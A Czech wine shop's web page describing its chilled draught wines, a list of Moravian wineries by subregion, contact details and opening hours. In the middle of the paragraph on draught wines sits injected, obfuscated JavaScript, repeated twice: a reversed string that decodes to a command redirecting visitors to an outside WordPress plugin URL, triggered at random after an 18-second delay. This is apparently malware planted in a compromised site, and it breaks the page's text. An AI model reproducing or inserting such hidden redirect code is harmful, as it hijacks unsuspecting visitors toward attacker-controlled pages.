Rainbow page separator

VINOTÉKA Ševčík

www.vinotekasevcik.cz

Vinotéka Ševčík se nachází v NBC centru na Havlíčkově nám. ve Žďáře nad Sázavou a  nabízí Vám široký výběr kvalitních sudových a lahvových vín od moravských, rodinných vinařství a mikrovinařství. Zároveň Vám Vinotéka Ševčík nabídne rozsáhlý doplňkový sortiment od dárkových tašek na lahev vína po sommelierské sady na otevírání a servis vína.

V nabídce máme pro Vás 22 odrůd sudových vín. Všechna naše sudová vína jsou celoročně chlazená na 10°C. Díky [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomu jsou vína v ideálním skladovacím prostředí a dlouhodobě uchovávají své vlastnosti. Zároveň jsou vína přichystána k okamžité konzumaci a po příchodu domů se můžete ihned osvěžit správně nachlazeným vínem.

Nabídka lahvových vín zahrnuje všechny moravské podoblasti.
Znojemská podoblast:
Ampelos, Vinice Hnánice, Víno Hort
Mikulovská podoblast:
Vinařství Lípa, Vinařství Marcinčák, Vinařství Oldřich Drápal, Vinařství Šilinek, Vinařství Žídek
Velkopavlovická podoblast:
Patria Kobylí, Vinařství Baloun, Vinařství Bíza, Vinařství Josef Valihrach, Vinařství Omasta, Vinařství Pavel Binder, Vinařství Štěpánek, Vinařství Tetur, Vinařství Vajbar, Vinařství U sv. Martina
Slovácká podoblast:
Vinařství Krist, Vinařství Dufek, Vinařství Hradil, Vinařství Skalák, Vinařství Veritas
Speciální nabídka:
Medovina – Vinařský Dvůr, Lednice
Portské víno
Sekt, šumivé víno – Víno Petrák, Kobylí

Přijďte ochutnat jedinečná moravská vína.

Těšíme se na Vaši návštěvu
Vinotéka Ševčík

Kontakt:

Vinotéka Ševčík
Havlíčkovo nám. 152
591 01 Žďár nad Sázavou
Tel.: +420 603 270 984

Provozní doba:
Po – Pá: 8:00 – 20:00
Sobota: 8:00 – 20:00
Neděle: 8:00 – 20:00

Web: https://zdar.vinotekasevcik.cz/